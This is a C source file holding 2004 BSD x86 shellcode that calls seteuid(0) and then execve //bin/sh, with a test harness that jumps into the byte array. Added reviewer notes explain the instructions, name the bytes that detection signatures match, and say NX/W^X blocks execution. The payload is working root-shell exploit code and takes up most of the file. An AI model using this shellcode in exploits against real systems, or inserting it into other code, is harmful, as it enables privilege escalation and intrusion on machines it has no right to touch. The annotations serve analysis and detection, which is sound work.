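///////////////////////////////////////////////////
// Author: Clown
// Contact: clown@hysteria.sk
// date: Wed Oct 13 14:57:03 2004
//
// seteuid(0); execve //bin/sh, exit(0);
///////////////////////////////////////////////////
//
// Reviewer notes:
//  - The bytes are 32-bit x86 code that enters the kernel through
//    `int $0x80` with arguments on the stack (the BSD i386 convention the
//    author targets). The byte string below is unchanged from the original.
//  - The two pushed immediates spell "//bin/sh" in little-endian order.
//    That string and the `mov $imm8,%al ; int $0x80` pairs are the parts
//    of this listing that content signatures usually key on.
//  - The harness calls into a data array. Where data pages are mapped
//    non-executable (NX / W^X), that call faults and the payload never runs.

#include <stdio.h>  /* header name was missing in the original listing; printf needs it */

char BSD_shellcode[] =
    // seteuid(0);
    "\x29\xc0"              // sub %eax,%eax
    "\x50"                  // push %eax
    "\x50"                  // push %eax
    "\xb0\xb7"              // mov $0xb7,%al
    "\xcd\x80"              // int $0x80

    // execve //bin/sh
    // No NUL is pushed before the path; the string is terminated by the zero
    // dword the seteuid step left on the stack.
    "\x29\xc0"              // sub %eax,%eax
    "\x68\x6e\x2f\x73\x68"  // push $0x68732f6e
    "\x68\x2f\x2f\x62\x69"  // push $0x69622f2f
    "\x89\xe3"              // mov %esp,%ebx
    "\x50"                  // push %eax
    "\x54"                  // push %esp
    "\x53"                  // push %ebx
    "\x53"                  // push %ebx
    "\xb0\x3b"              // mov $0x3b,%al
    "\xcd\x80"              // int $0x80

    // exit(0);
    // NOTE(review): no status value is pushed for this call, so the exit
    // status appears to be whatever is already on the stack rather than a
    // guaranteed 0. This is only reached if execve fails.
    "\x28\xc0"              // sub %al,%al
    "\xfe\xc0"              // inc %al
    "\xcd\x80";             // int 0x80

/*
 * Test harness: print the payload length, then transfer control to it.
 *
 * Changes from the original listing:
 *  - `(long) BSD = &BSD_shellcode;` used a cast as an lvalue, which current
 *    compilers reject; the pointer is now initialised with an explicit cast.
 *  - The length was printed with %d although sizeof yields a size_t; it now
 *    uses %zu.
 *  - sizeof counted the string literal's terminating NUL, so the printed
 *    figure was one byte larger than the payload; the NUL is now excluded.
 *
 * Returns 0, but only if the call into the array ever returns.
 */
int main(void)
{
    /* Object-to-function pointer conversion is a compiler extension, not ISO C. */
    void (*BSD)(void) = (void (*)(void))BSD_shellcode;

    printf(" %zu bytes\n", sizeof BSD_shellcode - 1);
    BSD();
    return 0;
}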